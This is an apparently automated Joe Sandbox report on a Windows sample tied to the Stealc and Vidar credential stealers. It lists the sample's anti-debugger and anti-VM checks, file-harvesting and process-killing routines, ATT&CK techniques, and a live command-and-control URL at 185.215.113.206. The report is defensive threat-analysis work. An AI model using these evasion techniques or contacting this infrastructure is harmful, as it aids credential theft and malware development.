                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F04EA second address: 54F051C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D88h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F051C second address: 54F0520 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0520 second address: 54F0526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0526 second address: 54F052C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F052C second address: 54F0530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F056B second address: 54F0571 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0571 second address: 54F0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0575 second address: 54F05AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F0DECD24174h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F0DECD24170h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F05AD second address: 54F05CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11244CB second address: 11244EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1124874 second address: 1124891 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D89h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F6D94E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision (graph_0-39030)
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C8E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C81710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C81710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C94B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C94B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C93B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C93B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C8BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C8EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C8DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C8DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C81160 GetSystemInfo,ExitProcess,0_2_00C81160
                Source: file.exe, file.exe, 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;<
                Source: file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37842
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37845
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37857
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37861
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37897
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37731
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C84610 VirtualProtect ?,00000004,00000100,00000000,0_2_00C84610
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C99BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C99BB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C99AA0 mov eax, dword ptr fs:[00000030h] 0_2_00C99AA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C97690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00C97690
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3624, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C99790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C99790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C998E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00C998E0
Source: file.exe, file.exe, 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CC7588 cpuid 0_2_00CC7588
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C97D20
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C96BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00C96BC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C979E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C979E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C97BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C97BC0

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3624, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3624, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 39% | ReversingLabs | Win32.Trojan.Generic |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
Source | Detection | Scanner | Label | Link
https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/6c4adf523b719729.php | true | | unknown
http://185.215.113.206/ | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/405117-2476756634-1003 | file.exe, 00000000.00000002.2103784412.0000000001554000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/6c4adf523b719729.php_ | file.exe, 00000000.00000002.2103784412.0000000001569000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206 | file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.206/~gq | file.exe, 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/ws | file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.206/$ | file.exe, 00000000.00000002.2103784412.0000000001582000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2061051331.000000000539B000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1544876
                                  Start date and time:2024-10-29 20:42:18 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 19s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 128
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated
                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: file.exe
                                  No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc | 185.215.113.206/
| file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
| file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
| file.exe | malicious | Stealc, Vidar | 185.215.113.206
| file.exe | malicious | LummaC | 185.215.113.16
| file.exe | malicious | LummaC | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Stealc, Vidar | 185.215.113.206
| file.exe | malicious | LummaC | 185.215.113.16
| file.exe | malicious | Stealc | 185.215.113.206
| file.exe | malicious | Stealc, Vidar | 185.215.113.206
                                  No context
                                  No context
                                  No created / dropped files found
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.9606922425137245
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'127'360 bytes
                                  MD5:264daa04defc6b3cb7cd8b682db05acd
                                  SHA1:10f55121d698817f1960530cbec2bd1da8564a8d
                                  SHA256:4a39c54963c15bf5b9388247e2a83ca5bbb1b69ca3e016ad75c8cea50a99a43a
                                  SHA512:d994b1e7db132e7cff596e977badcd5a57ca28c81360d6a5452bce1b66f6d0358a029555f5612fb8363ded8d6ca37e8e96cd43a89e45e1ed4dbef8f112c8159f
                                  SSDEEP:49152:bor8zruyLK/n+IzUoAeFBe2L0eN0xvVswI2fwhE+tLs+coR0qGPJ:8yO+IzUsBtL0HVs7rtY+coR0qGPJ
                                  TLSH:E3A5336BFB5E446DD88AE2BEE41BC9B97DA13E76474BA960BF4005351C1772013223F8
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0xb2a000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                                  Instruction
                                  jmp 00007F0DECBC2DEAh
                                  andps xmm4, dqword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  (disassembly listing continues as zero padding: `add byte ptr [eax], al` is the decoding of a 00 00 byte pair and repeats for the rest of the dump, with three stray forms from non-zero bytes: `add byte ptr [eax+eax*4], cl`, `adc byte ptr [eax], al`, `add dword ptr [edx], ecx`. There is no meaningful code in this range.)
                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319
                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                  Only the import directory (0x64 bytes) and an 8-byte relocation directory (an empty block header) are populated, both inside .idata; there is no TLS, debug, load-config, bound-import or security (Authenticode) directory, and the IAT directory entry is zero even though imports exist.
                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  (unnamed) | 0x1000 | 0x2e7000 | 0x67600 | ebc39c9b19a6f4207044c9414823c532 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  (unnamed) | 0x2ea000 | 0x2a2000 | 0x200 | 6e47e0a01680733defa007962e82a363 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  iuotgoma | 0x58c000 | 0x19d000 | 0x19c600 | b7130feff10f6be0ec89426944c56111 | False | 0.9950269020915429 | data | 7.954742797276652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  ujumrvwn | 0x729000 | 0x1000 | 0x400 | cad865f7c5c294089cbc1665a24933be | False | 0.787109375 | data | 6.182343172420204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant | 0x72a000 | 0x3000 | 0x2200 | 708f37411032fa6ebb0fabf06e54f985 | False | 0.06284466911764706 | DOS executable (COM) | 0.7785209813110858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
